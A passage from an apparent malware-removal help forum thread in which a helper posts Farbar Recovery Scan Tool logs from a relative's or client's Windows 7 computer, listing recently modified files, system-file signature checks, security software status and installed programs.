2014-08-15 21:36 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-15 21:35 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-14 19:14 - 2014-09-13 11:47 - 00014807 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-14 19:02 - 2014-09-13 11:47 - 00000000 ____D () C:\FRST
2014-09-14 18:49 - 2013-06-22 11:23 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-14 18:33 - 2012-07-06 18:03 - 02059731 _____ () C:\Windows\WindowsUpdate.log
2014-09-14 18:13 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-14 17:49 - 2013-06-22 11:23 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-13 19:23 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 18:58 - 2014-09-13 10:19 - 00000000 ____D () C:\Qoobox
2014-09-13 18:53 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-13 18:37 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-13 18:37 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-13 18:26 - 2012-03-25 21:02 - 00000000 ____D () C:\Program Files\RegZooka
2014-09-13 18:25 - 2014-07-09 18:33 - 00002140 _____ () C:\Windows\setupact.log
2014-09-13 18:25 - 2014-07-09 18:32 - 00027664 _____ () C:\Windows\PFRO.log
2014-09-13 18:25 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-13 17:50 - 2012-03-25 12:25 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 11:38 - 2014-09-13 10:19 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 11:32 - 2012-03-24 10:28 - 00000000 ____D () C:\Users\Dale
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:40 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-13 02:20 - 2014-09-13 10:18 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 02:19 - 2014-09-13 10:18 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:50 - 2014-09-13 01:38 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:36 - 2012-03-25 14:34 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-13 01:35 - 2012-03-25 14:36 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\Malwarebytes
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 01:29 - 2012-05-27 19:36 - 00000000 ____D () C:\Windows\pss
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-13 00:13 - 2014-09-08 09:30 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-13 00:13 - 2014-09-08 09:30 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-13 00:13 - 2013-06-03 10:04 - 118804480 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW
2014-09-12 23:36 - 2012-03-24 10:31 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-12 23:23 - 2014-08-22 15:38 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-09-12 21:54 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140913-103855.backup
2014-09-12 20:01 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-12 19:04 - 2012-03-24 18:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-12 18:59 - 2013-07-13 18:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-12 18:47 - 2012-03-24 19:36 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-12 18:46 - 2014-05-06 18:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 18:14 - 2014-09-04 11:33 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-08 12:49 - 2014-08-24 09:43 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-09-08 12:49 - 2013-11-14 09:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-09-08 12:48 - 2012-05-15 08:43 - 00000000 ____D () C:\$AVG
2014-09-04 20:52 - 2014-09-12 00:48 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-12 00:48 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-03 07:34 - 2012-03-25 21:17 - 00000000 ____D () C:\Windows\options
2014-09-02 21:39 - 2013-07-09 21:46 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-02 21:16 - 2014-09-02 19:12 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-09-02 21:05 - 2012-03-24 13:06 - 00000000 ____D () C:\Windows.old
2014-08-28 18:21 - 2009-07-13 23:33 - 00426472 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-26 21:52 - 2012-08-15 07:52 - 01316352 ___SH () C:\Users\Dale\Documents\Thumbs.db
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-25 17:36 - 2012-03-25 12:31 - 00000000 ____D () C:\Program Files\AVG Secure Search
2014-08-25 00:06 - 2014-08-24 09:36 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:47 - 2012-03-25 12:28 - 00000000 ____D () C:\Program Files\AVG
2014-08-24 09:45 - 2014-08-24 09:39 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:31 - 2014-08-24 09:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-22 20:46 - 2014-08-28 00:19 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-28 00:19 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 15:48 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140912-215418.backup
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-22 15:35 - 2014-08-22 15:33 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-20 06:51 - 2013-06-22 11:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-08-19 12:39 - 2014-09-12 19:00 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-18 17:26 - 2014-09-12 19:00 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-12 19:00 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-12 19:00 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-12 19:00 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-12 19:00 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-12 19:00 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-12 19:00 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-12 19:00 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-12 19:00 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-12 19:00 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-12 19:00 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-12 19:00 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-12 19:00 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-12 19:00 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-12 19:00 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-12 19:00 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-12 19:00 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-12 19:00 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-12 19:00 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-12 19:00 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-12 19:00 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-12 19:00 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-16 18:52 - 2014-02-09 11:10 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
 
Files to move or delete:
====================
C:\Users\Dale\en_res.dll
C:\Users\Dale\es_res.dll
C:\Users\Dale\fr_res.dll
C:\Users\Dale\grm_res.dll
C:\Users\Dale\it_res.dll
C:\Users\Dale\jp_res.dll
C:\Users\Dale\mfc80u.dll
C:\Users\Dale\msvcr80.dll
C:\Users\Dale\PCPE Setup.exe
C:\Users\Dale\pt_res.dll
C:\Users\Dale\ru_res.dll
C:\Users\Dale\zh_res.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 17:15
 
==================== End Of Log ============================


#4 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 14 September 2014 - 07:57 PM

I have lost connection with their computer.  As soon as I can get it back I will post the addition.txt.



#5 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 14 September 2014 - 08:01 PM

Addition.txt:

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 12-09-2014
Ran by Dale at 2014-09-14 19:26:41
Running from C:\Users\Dale\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: AVG AntiVirus Free Edition 2014 (Disabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Disabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2014 (Disabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.5.0.1060 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.5.0.1060 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Reader X (10.1.4) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.4 - Adobe Systems Incorporated)
Advertising Center (Version: 0.0.0.2 - Nero AG) Hidden
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
AOL Mail and AIM Gadget (HKLM\...\{F226C1DA-66D7-4ABC-86B5-3F978A660EBF}) (Version: 1.0.0 - AOL LLC)
AOL Registration (HKLM\...\AOL Regclient) (Version:  - )
AOL Toolbar (HKCU\...\AOL Toolbar) (Version:  - )
AOL Toolbar for Firefox (HKLM\...\AOL Toolbar for Firefox) (Version: 5.13.6.2 - AOL LLC)
AOL Uninstaller (Choose which Products to Remove) (HKLM\...\AOL Uninstaller) (Version:  - AOL LLC)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{0592EF96-69D8-4E4B-9CC9-88F58EA86F01}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Ask Toolbar (HKLM\...\{86D4B82A-ABED-442A-BE86-96357B70F4FE}) (Version: 1.14.1.0 - Ask.com) <==== ATTENTION
ATI Catalyst Install Manager (HKLM\...\{47FDEFC7-BFE6-FD75-41D1-28DD572BD2D9}) (Version: 3.0.715.0 - ATI Technologies, Inc.)
Audible Download Manager (HKLM\...\AudibleDownloadManager) (Version: 6.6.0.15 - Audible, Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4765 - AVG Technologies)
AVG 2014 (Version: 14.0.4015 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4765 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM\...\CANONIJPLM100) (Version:  - )
Canon MG3100 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3100_series) (Version:  - )
Canon MG3100 series On-screen Manual (HKLM\...\Canon MG3100 series On-screen Manual) (Version:  - )
Canon MG3100 series User Registration (HKLM\...\Canon MG3100 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM\...\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Solution Menu EX (HKLM\...\CanonSolutionMenuEX) (Version:  - )
Cassette2CD Wizard 2.02 (HKLM\...\{15CFEFBC-A542-4639-BA69-7BCDF65D194E}}_is1) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center HydraVision Full (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0210.2339.42455 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0210.2339.42455 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Czech (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Danish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Dutch (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help English (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Finnish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help French (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help German (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Greek (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Italian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Japanese (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Korean (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Polish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Russian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Spanish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Swedish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Thai (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Turkish (Version: 2010.0210.2338.42455 - ATI) Hidden
ccc-core-static (Version: 2010.0210.2339.42455 - ATI) Hidden
ccc-utility (Version: 2010.0210.2339.42455 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.16 - Piriform)
Creative DVD Audio Plugin for Audigy Series (HKLM\...\CTDVDAudio Plugin) (Version:  - )
Dell 2335dn MFP Software Uninstall (HKLM\...\Dell 2335dn MFP) (Version:  - DELL Inc.)
Download Updater (AOL LLC) (HKLM\...\SoftwareUpdUtility) (Version:  - ) <==== ATTENTION
Family Tree Maker 2011 (HKLM\...\Family Tree Maker 2011) (Version: 20.0.376 - Ancestry.com)
Family Tree Maker 2011 (Version: 20.0.376 - Ancestry.com) Hidden
Google Drive (HKLM\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Earth (HKLM\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{20C6FF70-690B-4DF7-8F5D-269DD3A7FD23}) (Version: 3.0.2.163 - Apple Inc.)
Imaging ActiveX Control (HKLM\...\{468B0D45-CFEB-40AB-8245-89455F1DA7FE}) (Version: 2.0.1 - Software & Services)
ImagXpress (Version: 7.0.74.0 - Nero AG) Hidden
iTunes (HKLM\...\{C197BC08-3D82-4651-8886-E68C21578A38}) (Version: 11.1.3.8 - Apple Inc.)
Java Auto Updater (Version: 2.0.7.1 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 31 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version: 6.0.310 - Oracle)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Menu Templates - Pack 1 (Version: 9.6.0.0 - Nero AG) Hidden
Menu Templates - Starter Kit (Version: 9.6.0.0 - Nero AG) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Primary Interoperability Assemblies 2005 (HKLM\...\{D24DB8B9-BB6C-4334-9619-BA1C650E13D3}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft VC9 runtime libraries (Version: 1.0.0 - AOL LLC) Hidden
Microsoft VC9 runtime libraries (Version: 2.0.0 - AOL Inc.) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Movie Templates - Starter Kit (Version: 9.6.0.0 - Nero AG) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Nero 9 Essentials (HKLM\...\{22053dad-7249-4da3-9254-fcada5927286}) (Version:  - Nero AG)
Nero BurnRights (Version: 3.4.13.100 - Nero AG) Hidden
